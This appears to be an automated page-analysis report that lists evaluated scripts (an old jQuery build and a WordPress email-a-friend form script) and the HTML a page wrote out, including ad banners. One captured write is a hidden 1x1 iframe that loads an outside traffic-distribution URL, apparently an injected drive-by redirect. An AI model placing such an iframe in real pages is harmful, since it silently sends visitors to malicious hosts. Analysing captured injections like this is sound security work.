                        if ((type == "" && !! z || type == "=" && z == m[5] || type == "!=" && z != m[5] || type == "^=" && z && !z.indexOf(m[5]) || type == "$=" && z.substr(z.length - m[5].length) == m[5] || (type == "*=" || type == "~=") && z.indexOf(m[5]) >= 0) ^ h) g.push(a)
                    }
                    r = g
                } else if (m[1] == ":" && m[2] == "nth-child") {
                    var e = {},
                        g = [],
                        test = /(\d*)n\+?(\d*)/.exec(m[3] == "even" && "2n" || m[3] == "odd" && "2n+1" || !/\D/.test(m[3]) && "n+" + m[3] || m[3]),
                        first = (test[1] || 1) - 0,
                        d = test[2] - 0;
                    for (var i = 0, rl = r.length; i < rl; i++) {
                        var j = r[i],
                            parentNode = j.parentNode,
                            id = E.data(parentNode);
                        if (!e[id]) {
                            var c = 1;
                            for (var n = parentNode.firstChild; n; n = n.nextSibling) if (n.nodeType == 1) n.nodeIndex = c++;
                            e[id] = true
                        }
                        var b = false;
                        if (first == 1) {
                            if (d == 0 || j.nodeIndex == d) b = true
                        } else if ((j.nodeIndex + d) % first == 0) b = true;
                        if (b ^ h) g.push(j)
                    }
                    r = g
                } else {
                    var f = E.expr[m[1]];
                    if (typeof f != "string") f = E.expr[m[1]][m[2]];
                    f = eval("false||function(a,i){return " + f + "}");
                    r = E.grep(r, f, h)
                }
            }
            return {
                r: r,
                t: t
            }
        },
        dir: function(b, c) {
            var d = [];
            var a = b[c];
            while (a && a != document) {
                if (a.nodeType == 1) d.push(a);
                a = a[c]
            }
            return d
        },
        nth: function(a, e, c, b) {
            e = e || 1;
            var d = 0;
            for (; a; a = a[c]) if (a.nodeType == 1 && ++d == e) break;
            return a
        },
        sibling: function(n, a) {
            var r = [];
            for (; n; n = n.nextSibling) {
                if (n.nodeType == 1 && (!a || n != a)) r.push(n)
            }
            return r
        }
    });
    E.event = {
        add: function(g, e, c, h) {
            if (E.browser.msie && g.setInterval != undefined) g = window;
            if (!c.guid) c.guid = this.guid++;
            if (h != undefined) {
                var d = c;
                c = function() {
                    return d.apply(this, arguments)
                };
                c.data = h;
                c.guid = d.guid
            }
            var i = e.split(".");
            e = i[0];
            c.type = i[1];
            var b = E.data(g, "events") || E.data(g, "events", {});
            var f = E.data(g, "handle", function() {
                var a;
                if (typeof E == "undefined" || E.event.triggered) return a;
                a = E.event.handle.apply(g, arguments);
                return a
            });
            var j = b[e];
            if (!j) {
                j = b[e] = {};
                if (g.addEventListener) g.addEventListener(e, f, false);
                else g.attachEvent("on" + e, f)
            }
            j[c.guid] = c;
            this.global[e] = true
        },
        guid: 1,
        global: {},
        remove: function(d, c, b) {
            var e = E.data(d, "events"),
                ret, index;
            if (typeof c == "string") {
                var a = c.split(".");
                c = a[0]
            }
            if (e) {
                if (c && c.type) {
                    b = c.handler;
                    c = c.type
                }
                if (!c) {
                    for (c in e) this.remove(d, c)
                } else if (e[c]) {
                    if (b) delete e[c][b.guid];
                    else for (b in e[c]) if (!a[1] || e[c][b].type == a[1]) delete e[c][b];
                    for (ret in e[c]) break;
                    if (!ret) {
                        if (d.removeEventListener) d.removeEventListener(c, E.data(d, "handle"), false);
                        else d.detachEvent("on" + c, E.data(d, "handle"));
                        ret = null;
                        delete e[c]
                    }
                }
                for (ret in e) break;
                if (!ret) {
                    E.removeData(d, "events");
                    E.removeData(d, "handle")
                }
            }
        },
        trigger: function(d, b, e, c, f) {
            b = E.makeArray(b || []);
            if (!e) {
                if (this.global[d]) E("*").add([window, document]).trigger(d, b)
            } else {
                var a, ret, fn = E.isFunction(e[d] || null),
                    evt = !b[0] || !b[0].preventDefault;
                if (evt) b.unshift(this.fix({
                    type: d,
                    target: e
                }));
                b[0].type = d;
                if (E.isFunction(E.data(e, "handle"))) a = E.data(e, "handle").apply(e, b);
                if (!fn && e["on" + d] && e["on" + d].apply(e, b) === false) a = false;
                if (evt) b.shift();
                if (f && f.apply(e, b) === false) a = false;
                if (fn && c !== false && a !== false && !(E.nodeName(e, 'a') && d == "click")) {
                    this.triggered = true;
                    e[d]()
                }
                this.triggered = false
            }
            return a
        },
        handle: function(d) {
            var a;
            d = E.event.fix(d || window.event || {});
            var b = d.type.split(".");
            d.type = b[0];
            var c = E.data(this, "events") && E.data(this, "events")[d.type],
                args = Array.prototype.slice.call(arguments, 1);
            args.unshift(d);
            for (var j in c) {
                args[0].handler = c[j];
                args[0].data = c[j].data;
                if (!b[1] || c[j].type == b[1]) {
                    var e = c[j].apply(this, args);
                    if (a !== false) a = e;
                    if (e === false) {
                        d.preventDefault();
                        d.stopPropagation()
                    }
                }
            }
            if (E.browser.msie) d.target = d.preventDefault = d.stopPropagation = d.handler = d.data = null;
            return a
        },
        fix: function(c) {
            var a = c;
            c = E.extend({}, a);
            c.preventDefault = function() {
                if (a.preventDefault) a.preventDefault();
                a.returnValue = false
            };
            c.stopPropagation = function() {
                if (a.stopPropagation) a.stopPropagation();
                a.cancelBubble = true
            };
            if (!c.target && c.srcElement) c.target = c.srcElement;
            if (E.browser.safari && c.target.nodeType == 3) c.target = a.target.parentNode;
            if (!c.relatedTarget && c.fromElement) c.relatedTarget = c.fromElement == c.target ? c.toElement : c.fromElement;
            if (c.pageX == null && c.clientX != null) {
                var e = document.documentElement,
                    b = document.body;
                c.pageX = c.clientX + (e && e.scrollLeft || b.scrollLeft || 0);
                c.pageY = c.clientY + (e && e.scrollTop || b.scrollTop || 0)
            }
            if (!c.which && (c.charCode || c.keyCode)) c.which = c.charCode || c.keyCode;
            if (!c.metaKey && c.ctrlKey) c.metaKey = c.ctrlKey;
            if (!c.which && c.button) c.which = (c.button & 1 ? 1 : (c.button & 2 ? 3 : (c.button & 4 ? 2 : 0)));
            return c
        }
    };
    E.fn.extend({
        bind: function(c, a, b) {
            return c == "unload" ? this.one(c, a, b) : this.each(function() {
                E.event.add(this, c, b || a, b && a)
            })
        },
        one: function(d, b, c) {
            return this.each(function() {
                E.event.add(this, d, function(a) {
                    E(this).unbind(a);
                    return (c || b).apply(this, arguments)
                }, c && b)
            })
        },
        unbind: function(a, b) {
            return this.each(function() {
                E.event.remove(this, a, b)
            })
        },
        trigger: function(c, a, b) {
            return this.each(function() {
                E.event.trigger(c, a, this, true, b)
            })
        },
        triggerHandler: function(c, a, b) {
            if (this[0]) return E.event.trigger(c, a, this[0], false, b)
        },
        toggle: function() {
            var a = arguments;
            return this.click(function(e) {
                this.lastToggle = 0 == this.lastToggle ? 1 : 0;
                e.preventDefault();
                return a[this.lastToggle].apply(this, [e]) || false
            })
        },
        hover: function(f, g) {
            function handleHover(e) {
                var p = e.relatedTarget;
                while (p && p != this) try {
                    p = p.parentNode
                } catch (e) {
                    p = this
                };
                if (p == this) return false;
                return (e.type == "mouseover" ? f : g).apply(this, [e])
            }
            return this.mouseover(handleHover).mouseout(handleHover)
        },
        ready: function(f) {
            bindReady();
            if (E.isReady) f.apply(document, [E]);
            else E.readyList.push(function() {
                return f.apply(this, [E])
            });
            return this
        }
    });
    E.extend({
        isReady: false,
        readyList: [],
        ready: function() {
            if (!E.isReady) {
                E.isReady = true;
                if (E.readyList) {
                    E.each(E.readyList, function() {
                        this.apply(document)
                    });
                    E.readyList = null
                }
                if (E.browser.mozilla || E.browser.opera) document.removeEventListener("DOMContentLoaded", E.ready, false);
                if (!window.frames.length) E(window).load(function() {
                    E("#__ie_init").remove()
                })
            }
        }
    });
    E.each(("blur,focus,load,resize,scroll,unload,click,dblclick," + "mousedown,mouseup,mousemove,mouseover,mouseout,change,select," + "submit,keydown,keypress,keyup,error").split(","), function(i, o) {
        E.fn[o] = function(f) {
            return f ? this.bind(o, f) : this.trigger(o)
        }
    });
    var x = false;

    function bindReady() {
        if (x) return;
        x = true;
        if (E.browser.mozilla || E.browser.opera) document.addEventListener("DOMContentLoaded", E.ready, false);
        else if (E.browser.msie) {
            document.write("<scr" + "ipt id=__ie_init defer=true " + "src=//:><\/script>");
            var a = document.getElementById("__ie_init");
            if (a) a.onreadystatechange = function() {
                if (this.readyState != "complete") return;
                E.ready()
            };
            a = null
        } else if (E.browser.safari) E.safariTimer = setInterval(function() {
            if (document.readyState == "loaded" || document.readyState == "complete") {
                clearInterval(E.safariTimer);
                E.safariTimer = null;
                E.ready()
            }
        }, 10);
        E.event.add(window, "load", E.ready)
    }
    E.fn.extend({
        load: function(g, d, c) {
            if (E.isFunction(g)) return this.bind("load", g);
            var e = g.indexOf(" ");
            if (e >= 0) {
                var i = g.slice(e, g.length);
                g = g.slice(0, e)
            }
            c = c ||
            function() {};
            var f = "GET";
            if (d) if (E.isFunction(d)) {
                c = d;
                d = null
            } else {
                d = E.param(d);
                f = "POST"
            }
            var h = this;
            E.ajax({
                url: g,
                type: f,
                data: d,
                complete: function(a, b) {
                    if (b == "success" || b == "notmodified") h.html(i ? E("<div/>").append(a.responseText.replace(/<script(.|\s)*?\/script>/g, "")).find(i) : a.responseText);
                    setTimeout(function() {
                        h.each(c, [a.responseText, b, a])
                    }, 13)
                }
            });
            return this
        },
        serialize: function() {
            return E.param(this.serializeArray())
        },
        serializeArray: function() {
            return this.map(function() {
                return E.nodeName(this, "form") ? E.makeArray(this.elements) : this
            }).filter(function() {
                return this.name && !this.disabled && (this.checked || /select|textarea/i.test(this.nodeName) || /text|hidden|password/i.test(this.type))
            }).map(function(i, c) {
                var b = E(this).val();
                return b == null ? null : b.constructor == Array ? E.map(b, function(a, i) {
                    return {
                        name: c.name,
                        value: a
                    }
                }) : {
                    name: c.name,
                    value: b
                }
            }).get()
        }
    });
    E.each("ajaxStart,ajaxStop,ajaxComplete,ajaxError,ajaxSuccess,ajaxSend".split(","), function(i, o) {
        E.fn[o] = function(f) {
            return this.bind(o, f)
        }
    });
    var B = (new Date).getTime();
    E.extend({
        get: function(d, b, a, c) {
            if (E.isFunction(b)) {
                a = b;
                b = null
            }
            return E.ajax({
                type: "GET",
                url: d,
                data: b,
                success: a,
                dataType: c
            })
        },
        getScript: function(b, a) {
            return E.get(b, null, a, "script")
        },
        getJSON: function(c, b, a) {
            return E.get(c, b, a, "json")
        },
        post: function(d, b, a, c) {
            if (E.isFunction(b)) {
                a = b;
                b = {}
            }
            return E.ajax({
                type: "POST",
                url: d,
                data: b,
                success: a,
                dataType: c
            })
        },
        ajaxSetup: function(a) {
            E.extend(E.ajaxSettings, a)
        },
        ajaxSettings: {
            global: true,
            type: "GET",
            timeout: 0,
            contentType: "application/x-www-form-urlencoded",
            processData: true,
            async: true,
            data: null
        },
        lastModified: {},
        ajax: function(s) {
            var f, jsre = /=(\?|%3F)/g,
                status, data;
            s = E.extend(true, s, E.extend(true, {}, E.ajaxSettings, s));
            if (s.data && s.processData && typeof s.data != "string") s.data = E.param(s.data);
            if (s.dataType == "jsonp") {
                if (s.type.toLowerCase() == "get") {
                    if (!s.url.match(jsre)) s.url += (s.url.match(/\?/) ? "&" : "?") + (s.jsonp || "callback") + "=?"
                } else if (!s.data || !s.data.match(jsre)) s.data = (s.data ? s.data + "&" : "") + (s.jsonp || "callback") + "=?";
                s.dataType = "json"
            }
            if (s.dataType == "json" && (s.data && s.data.match(jsre) || s.url.match(jsre))) {
                f = "jsonp" + B++;
                if (s.data) s.data = s.data.replace(jsre, "=" + f);
                s.url = s.url.replace(jsre, "=" + f);
                s.dataType = "script";
                window[f] = function(a) {
                    data = a;
                    success();
                    complete();
                    window[f] = undefined;
                    try {
                        delete window[f]
                    } catch (e) {}
                }
            }
            if (s.dataType == "script" && s.cache == null) s.cache = false;
            if (s.cache === false && s.type.toLowerCase() == "get") s.url += (s.url.match(/\?/) ? "&" : "?") + "_=" + (new Date()).getTime();
            if (s.data && s.type.toLowerCase() == "get") {
                s.url += (s.url.match(/\?/) ? "&" : "?") + s.data;
                s.data = null
            }
            if (s.global && !E.active++) E.event.trigger("ajaxStart");
            if (!s.url.indexOf("http") && s.dataType == "script") {
                var h = document.getElementsByTagName("head")[0];
                var g = document.createElement("script");
                g.src = s.url;
                if (!f && (s.success || s.complete)) {
                    var j = false;
                    g.onload = g.onreadystatechange = function() {
                        if (!j && (!this.readyState || this.readyState == "loaded" || this.readyState == "complete")) {
                            j = true;
                            success();
                            complete();
                            h.removeChild(g)
                        }
                    }
                }
                h.appendChild(g);
                return
            }
            var k = false;
            var i = window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
            i.open(s.type, s.url, s.async);
            if (s.data) i.setRequestHeader("Content-Type", s.contentType);
            if (s.ifModified) i.setRequestHeader("If-Modified-Since", E.lastModified[s.url] || "Thu, 01 Jan 1970 00:00:00 GMT");
            i.setRequestHeader("X-Requested-With", "XMLHttpRequest");
            if (s.beforeSend) s.beforeSend(i);
            if (s.global) E.event.trigger("ajaxSend", [i, s]);
            var c = function(a) {
                    if (!k && i && (i.readyState == 4 || a == "timeout")) {
                        k = true;
                        if (d) {
                            clearInterval(d);
                            d = null
                        }
                        status = a == "timeout" && "timeout" || !E.httpSuccess(i) && "error" || s.ifModified && E.httpNotModified(i, s.url) && "notmodified" || "success";
                        if (status == "success") {
                            try {
                                data = E.httpData(i, s.dataType)
                            } catch (e) {
                                status = "parsererror"
                            }
                        }
                        if (status == "success") {
                            var b;
                            try {
                                b = i.getResponseHeader("Last-Modified")
                            } catch (e) {}
                            if (s.ifModified && b) E.lastModified[s.url] = b;
                            if (!f) success()
                        } else E.handleError(s, i, status);
                        complete();
                        if (s.async) i = null
                    }
                };
            if (s.async) {
                var d = setInterval(c, 13);
                if (s.timeout > 0) setTimeout(function() {
                    if (i) {
                        i.abort();
                        if (!k) c("timeout")
                    }
                }, s.timeout)
            }
            try {
                i.send(s.data)
            } catch (e) {
                E.handleError(s, i, null, e)
            }
            if (!s.async) c();
            return i;

            function success() {
                if (s.success) s.success(data, status);
                if (s.global) E.event.trigger("ajaxSuccess", [i, s])
            }
            function complete() {
                if (s.complete) s.complete(i, status);
                if (s.global) E.event.trigger("ajaxComplete", [i, s]);
                if (s.global && !--E.active) E.event.trigger("ajaxStop")
            }
        },
        handleError: function(s, a, b, e) {
            if (s.error) s.error(a, b, e);
            if (s.global) E.event.trigger("ajaxError", [a, s, e])
        },
        active: 0,
        httpSuccess: function(r) {
            try {
                return !r.status && location.protocol == "file:" || (r.status >= 200 && r.status < 300) || r.status == 304 || E.browser.safari && r.status == undefined
            } catch (e) {}
            return false
        },
        httpNotModified: function(a, c) {
            try {
                var b = a.getResponseHeader("Last-Modified");
                return a.status == 304 || b == E.lastModified[c] || E.browser.safari && a.status == undefined
            } catch (e) {}
            return false
        },
        httpData: function(r, b) {
            var c = r.getResponseHeader("content-type");
            var d = b == "xml" || !b && c && c.indexOf("xml") >= 0;
            var a = d ? r.responseXML : r.responseText;
            if (d && a.documentElement.tagName == "parsererror") throw "parsererror";
            if (b == "script") E.globalEval(a);
            if (b == "json") a = eval("(" + a + ")");
            return a
        },
        param: function(a) {
            var s = [];
            if (a.constructor == Array || a.jquery) E.each(a, function() {
                s.push(encodeURIComponent(this.name) + "=" + encodeURIComponent(this.value))
            });
            else for (var j in a) if (a[j] && a[j].constructor == Array) E.each(a[j], function() {
                s.push(encodeURIComponent(j) + "=" + encodeURIComponent(this))
            });
            else s.push(encodeURIComponent(j) + "=" + encodeURIComponent(a[j]));
            return s.join("&").replace(/%20/g, "+")
        }
    });
    E.fn.extend({
        show: function(b, a) {
            return b ? this.animate({
                height: "show",
                width: "show",
                opacity: "show"
            }, b, a) : this.filter(":hidden").each(function() {
                this.style.display = this.oldblock ? this.oldblock : "";
                if (E.css(this, "display") == "none") this.style.display = "block"
            }).end()
        },
        hide: function(b, a) {
            return b ? this.animate({
                height: "hide",
                width: "hide",
                opacity: "hide"
            }, b, a) : this.filter(":visible").each(function() {
                this.oldblock = this.oldblock || E.css(this, "display");
                if (this.oldblock == "none") this.oldblock = "block";
                this.style.display = "none"
            }).end()
        },
        _toggle: E.fn.toggle,
        toggle: function(a, b) {
            return E.isFunction(a) && E.isFunction(b) ? this._toggle(a, b) : a ? this.animate({
                height: "toggle",
                width: "toggle",
                opacity: "toggle"
            }, a, b) : this.each(function() {
                E(this)[E(this).is(":hidden") ? "show" : "hide"]()
            })
        },
        slideDown: function(b, a) {
            return this.animate({
                height: "show"
            }, b, a)
        },
        slideUp: function(b, a) {
            return this.animate({
                height: "hide"
            }, b, a)
        },
        slideToggle: function(b, a) {
            return this.animate({
                height: "toggle"
            }, b, a)
        },
        fadeIn: function(b, a) {
            return this.animate({
                opacity: "show"
            }, b, a)
        },
        fadeOut: function(b, a) {
            return this.animate({
                opacity: "hide"
            }, b, a)
        },
        fadeTo: function(c, a, b) {
            return this.animate({
                opacity: a
            }, c, b)
        },
        animate: function(k, i, h, g) {
            var j = E.speed(i, h, g);
            return this[j.queue === false ? "each" : "queue"](function() {
                j = E.extend({}, j);
                var f = E(this).is(":hidden"),
                    self = this;
                for (var p in k) {
                    if (k[p] == "hide" && f || k[p] == "show" && !f) return E.isFunction(j.complete) && j.complete.apply(this);
                    if (p == "height" || p == "width") {
                        j.display = E.css(this, "display");
                        j.overflow = this.style.overflow
                    }
                }
                if (j.overflow != null) this.style.overflow = "hidden";
                j.curAnim = E.extend({}, k);
                E.each(k, function(c, a) {
                    var e = new E.fx(self, j, c);
                    if (/toggle|show|hide/.test(a)) e[a == "toggle" ? f ? "show" : "hide" : a](k);
                    else {
                        var b = a.toString().match(/^([+-]=)?([\d+-.]+)(.*)$/),
                            start = e.cur(true) || 0;
                        if (b) {
                            var d = parseFloat(b[2]),
                                unit = b[3] || "px";
                            if (unit != "px") {
                                self.style[c] = (d || 1) + unit;
                                start = ((d || 1) / e.cur(true)) * start;
                                self.style[c] = start + unit
                            }
                            if (b[1]) d = ((b[1] == "-=" ? -1 : 1) * d) + start;
                            e.custom(start, d, unit)
                        } else e.custom(start, a, "")
                    }
                });
                return true
            })
        },
        queue: function(a, b) {
            if (E.isFunction(a)) {
                b = a;
                a = "fx"
            }
            if (!a || (typeof a == "string" && !b)) return A(this[0], a);
            return this.each(function() {
                if (b.constructor == Array) A(this, a, b);
                else {
                    A(this, a).push(b);
                    if (A(this, a).length == 1) b.apply(this)
                }
            })
        },
        stop: function() {
            var a = E.timers;
            return this.each(function() {
                for (var i = 0; i < a.length; i++) if (a[i].elem == this) a.splice(i--, 1)
            }).dequeue()
        }
    });
    var A = function(b, c, a) {
            if (!b) return;
            var q = E.data(b, c + "queue");
            if (!q || a) q = E.data(b, c + "queue", a ? E.makeArray(a) : []);
            return q
        };
    E.fn.dequeue = function(a) {
        a = a || "fx";
        return this.each(function() {
            var q = A(this, a);
            q.shift();
            if (q.length) q[0].apply(this)
        })
    };
    E.extend({
        speed: function(b, a, c) {
            var d = b && b.constructor == Object ? b : {
                complete: c || !c && a || E.isFunction(b) && b,
                duration: b,
                easing: c && a || a && a.constructor != Function && a
            };
            d.duration = (d.duration && d.duration.constructor == Number ? d.duration : {
                slow: 600,
                fast: 200
            }[d.duration]) || 400;
            d.old = d.complete;
            d.complete = function() {
                E(this).dequeue();
                if (E.isFunction(d.old)) d.old.apply(this)
            };
            return d
        },
        easing: {
            linear: function(p, n, b, a) {
                return b + a * p
            },
            swing: function(p, n, b, a) {
                return ((-Math.cos(p * Math.PI) / 2) + 0.5) * a + b
            }
        },
        timers: [],
        fx: function(b, c, a) {
            this.options = c;
            this.elem = b;
            this.prop = a;
            if (!c.orig) c.orig = {}
        }
    });
    E.fx.prototype = {
        update: function() {
            if (this.options.step) this.options.step.apply(this.elem, [this.now, this]);
            (E.fx.step[this.prop] || E.fx.step._default)(this);
            if (this.prop == "height" || this.prop == "width") this.elem.style.display = "block"
        },
        cur: function(a) {
            if (this.elem[this.prop] != null && this.elem.style[this.prop] == null) return this.elem[this.prop];
            var r = parseFloat(E.curCSS(this.elem, this.prop, a));
            return r && r > -10000 ? r : parseFloat(E.css(this.elem, this.prop)) || 0
        },
        custom: function(c, b, e) {
            this.startTime = (new Date()).getTime();
            this.start = c;
            this.end = b;
            this.unit = e || this.unit || "px";
            this.now = this.start;
            this.pos = this.state = 0;
            this.update();
            var f = this;

            function t() {
                return f.step()
            }
            t.elem = this.elem;
            E.timers.push(t);
            if (E.timers.length == 1) {
                var d = setInterval(function() {
                    var a = E.timers;
                    for (var i = 0; i < a.length; i++) if (!a[i]()) a.splice(i--, 1);
                    if (!a.length) clearInterval(d)
                }, 13)
            }
        },
        show: function() {
            this.options.orig[this.prop] = E.attr(this.elem.style, this.prop);
            this.options.show = true;
            this.custom(0, this.cur());
            if (this.prop == "width" || this.prop == "height") this.elem.style[this.prop] = "1px";
            E(this.elem).show()
        },
        hide: function() {
            this.options.orig[this.prop] = E.attr(this.elem.style, this.prop);
            this.options.hide = true;
            this.custom(this.cur(), 0)
        },
        step: function() {
            var t = (new Date()).getTime();
            if (t > this.options.duration + this.startTime) {
                this.now = this.end;
                this.pos = this.state = 1;
                this.update();
                this.options.curAnim[this.prop] = true;
                var a = true;
                for (var i in this.options.curAnim) if (this.options.curAnim[i] !== true) a = false;
                if (a) {
                    if (this.options.display != null) {
                        this.elem.style.overflow = this.options.overflow;
                        this.elem.style.display = this.options.display;
                        if (E.css(this.elem, "display") == "none") this.elem.style.display = "block"
                    }
                    if (this.options.hide) this.elem.style.display = "none";
                    if (this.options.hide || this.options.show) for (var p in this.options.curAnim) E.attr(this.elem.style, p, this.options.orig[p])
                }
                if (a && E.isFunction(this.options.complete)) this.options.complete.apply(this.elem);
                return false
            } else {
                var n = t - this.startTime;
                this.state = n / this.options.duration;
                this.pos = E.easing[this.options.easing || (E.easing.swing ? "swing" : "linear")](this.state, n, 0, 1, this.options.duration);
                this.now = this.start + ((this.end - this.start) * this.pos);
                this.update()
            }
            return true
        }
    };
    E.fx.step = {
        scrollLeft: function(a) {
            a.elem.scrollLeft = a.now
        },
        scrollTop: function(a) {
            a.elem.scrollTop = a.now
        },
        opacity: function(a) {
            E.attr(a.elem.style, "opacity", a.now)
        },
        _default: function(a) {
            a.elem.style[a.prop] = a.now + a.unit
        }
    };
    E.fn.offset = function() {
        var c = 0,
            top = 0,
            elem = this[0],
            results;
        if (elem) with(E.browser) {
            var b = E.css(elem, "position") == "absolute",
                parent = elem.parentNode,
                offsetParent = elem.offsetParent,
                doc = elem.ownerDocument,
                safari2 = safari && parseInt(version) < 522;
            if (elem.getBoundingClientRect) {
                box = elem.getBoundingClientRect();
                add(box.left + Math.max(doc.documentElement.scrollLeft, doc.body.scrollLeft), box.top + Math.max(doc.documentElement.scrollTop, doc.body.scrollTop));
                if (msie) {
                    var d = E("html").css("borderWidth");
                    d = (d == "medium" || E.boxModel && parseInt(version) >= 7) && 2 || d;
                    add(-d, -d)
                }
            } else {
                add(elem.offsetLeft, elem.offsetTop);
                while (offsetParent) {
                    add(offsetParent.offsetLeft, offsetParent.offsetTop);
                    if (mozilla && /^t[d|h]$/i.test(parent.tagName) || !safari2) d(offsetParent);
                    if (safari2 && !b && E.css(offsetParent, "position") == "absolute") b = true;
                    offsetParent = offsetParent.offsetParent
                }
                while (parent.tagName && !/^body|html$/i.test(parent.tagName)) {
                    if (!/^inline|table-row.*$/i.test(E.css(parent, "display"))) add(-parent.scrollLeft, -parent.scrollTop);
                    if (mozilla && E.css(parent, "overflow") != "visible") d(parent);
                    parent = parent.parentNode
                }
                if (safari2 && b) add(-doc.body.offsetLeft, -doc.body.offsetTop)
            }
            results = {
                top: top,
                left: c
            }
        }
        return results;

        function d(a) {
            add(E.css(a, "borderLeftWidth"), E.css(a, "borderTopWidth"))
        }
        function add(l, t) {
            c += parseInt(l) || 0;
            top += parseInt(t) || 0
        }
    }
})();

#2 JavaScript::Eval (size: 4990, repeated: 1)

var email = new sack(email_ajax_url);
var email_p = 0;
var email_pageid = 0;
var email_yourname = '';
var email_youremail = '';
var email_yourremarks = '';
var email_friendname = '';
var email_friendemail = '';
var email_friendnames = '';
var email_friendemails = '';
var email_imageverify = '';

function validate_email_form() {
    var a = false;
    var b = email_text_error + "\n";
    b = b + "__________________________________\n\n";
    if (document.getElementById('yourname')) {
        if (isEmpty(email_yourname) || !is_valid_name(email_yourname)) {
            b = b + email_text_name_invalid + "\n";
            a = true
        }
    }
    if (document.getElementById('youremail')) {
        if (isEmpty(email_youremail) || !is_valid_email(email_youremail)) {
            b = b + email_text_email_invalid + "\n";
            a = true
        }
    }
    if (document.getElementById('yourremarks')) {
        if (!isEmpty(email_yourremarks)) {
            if (!is_valid_remarks(email_yourremarks)) {
                b = b + email_text_remarks_invalid + "\n";
                a = true
            }
        }
    }
    if (document.getElementById('friendname')) {
        if (isEmpty(email_friendname)) {
            b = b + email_text_friend_names_empty + "\n";
            a = true
        } else {
            for (i = 0; i < email_friendnames.length; i++) {
                if (isEmpty(email_friendnames[i]) || !is_valid_name(email_friendnames[i])) {
                    b = b + email_text_friend_name_invalid + email_friendnames[i] + "\n";
                    a = true
                }
            }
        }
        if (email_friendnames.length > email_max_allowed) {
            b = b + email_text_max_friend_names_allowed + "\n";
            a = true
        }
    }
    if (isEmpty(email_friendemail)) {
        b = b + email_text_friend_emails_empty + "\n";
        a = true
    } else {
        for (i = 0; i < email_friendemails.length; i++) {
            if (isEmpty(email_friendemails[i]) || !is_valid_email(email_friendemails[i])) {
                b = b + email_text_friend_email_invalid + "\n";
                a = true
            }
        }
    }
    if (email_friendemails.length > email_max_allowed) {
        b = b + email_text_max_friend_emails_allowed + "\n";
        a = true
    }
    if (document.getElementById('friendname')) {
        if (email_friendnames.length != email_friendemails.length) {
            b = b + email_text_friends_tally + "\n";
            a = true
        }
    }
    if (document.getElementById('imageverify')) {
        if (isEmpty(email_imageverify)) {
            b = b + email_text_image_verify_empty + "\n";
            a = true
        }
    }
    if (a == true) {
        alert(b);
        return false
    } else {
        return true
    }
}
function isEmpty(a) {
    if (trim(a) == "") {
        return true
    }
    return false
}
function trim(a) {
    while (a.substring(0, 1) == ' ') a = a.substring(1, a.length);
    while (a.substring(a.length - 1, a.length) == ' ') a = a.substring(0, a.length - 1);
    return a
}
function is_valid_name(a) {
    var a = trim(a);
    var b = /[(\*\(\)\[\]\+\,\/\?\:\;\'\"\`\~\\#\$\%\^\&\<\>)+]/;
    return !b.test(a)
}
function is_valid_email(a) {
    var a = trim(a);
    var b = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
    return b.test(a)
}
function is_valid_remarks(a) {
    var a = trim(a);
    var b = new Array('apparently-to', 'cc', 'bcc', 'boundary', 'charset', 'content-disposition', 'content-type', 'content-transfer-encoding', 'errors-to', 'in-reply-to', 'message-id', 'mime-version', 'multipart/mixed', 'multipart/alternative', 'multipart/related', 'reply-to', 'x-mailer', 'x-sender', 'x-uidl');
    for (i = 0; i < b.length; i++) {
        if (a.indexOf(b[i]) != -1) {
            return false
        }
    }
    return true
}
function email_popup(a) {
    window.open(a, "_blank", "width=500,height=500,toolbar=0,menubar=0,location=0,resizable=0,scrollbars=1,status=0")
}
function email_form() {
    if (document.getElementById('yourname')) {
        email_yourname = document.getElementById('yourname').value
    }
    if (document.getElementById('youremail')) {
        email_youremail = document.getElementById('youremail').value
    }
    if (document.getElementById('yourremarks')) {
        email_yourremarks = document.getElementById('yourremarks').value
    }
    if (document.getElementById('friendname')) {
        email_friendname = document.getElementById('friendname').value;
        email_friendnames = email_friendname.split(",")
    }
    email_friendemail = document.getElementById('friendemail').value;
    email_friendemails = email_friendemail.split(",");
    if (document.getElementById('imageverify')) {
        email_imageverify = document.getElementById('imageverify').value
    }
    if (document.getElementById('p')) {
        email_p = document.getElementById('p').value
    }
    if (document.getElementById('page_id')) {
        email_pageid = document.getElementById('page_id').value
    }
    if (validate_email_form()) {
        document.getElementById('wp-email-submit').disabled = true;
        document.getElementById('wp-email-loading').style.display = 'block';
        email.reset();
        if (document.getElementById('yourname')) {
            email.setVar('yourname', email_yourname);
            document.getElementById('yourname').disabled = true
        }
        if (document.getElementById('youremail')) {
            email.setVar('youremail', email_youremail);
            document.getElementById('youremail').disabled = true
        }
        if (document.getElementById('yourremarks')) {
            email.setVar('yourremarks', email_yourremarks);
            document.getElementById('yourremarks').disabled = true
        }
        if (document.getElementById('friendname')) {
            email.setVar('friendname', email_friendname);
            document.getElementById('friendname').disabled = true
        }
        email.setVar('friendemail', email_friendemail);
        document.getElementById('friendemail').disabled = true;
        if (document.getElementById('imageverify')) {
            email.setVar('imageverify', email_imageverify);
            document.getElementById('imageverify').disabled = true
        }
        if (document.getElementById('p')) {
            email.setVar('p', email_p)
        }
        if (document.getElementById('page_id')) {
            email.setVar('page_id', email_pageid)
        }
        email.setVar('wp-email', '1');
        email.setVar('popup', document.getElementById('popup').value);
        email.method = 'POST';
        email.element = 'wp-email';
        email.runAJAX()
    }
}

Executed Writes (7)

#1 JavaScript::Write (size: 202, repeated: 1)

<a href="javascript:submitCJ10422100X653('CJ10422100X653',null);"><img src="http://www.yceml.net/0852/10422100-10.gif" width="125" height="125" alt="Host Unlimited Domains on 1 Account" border="0"/></a>

#2 JavaScript::Write (size: 244, repeated: 1)

<a href="javascript:submitCJ10456719X659('CJ10456719X659',null);"><img src="http://www.yceml.net/0655/10456719-14.gif" width="125" height="125" alt="125x125 Sponsored Search connects businesses and customers online. January 08" border="0"/></a>

#3 JavaScript::Write (size: 264, repeated: 1)

<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>

#4 JavaScript::Write (size: 221, repeated: 1)

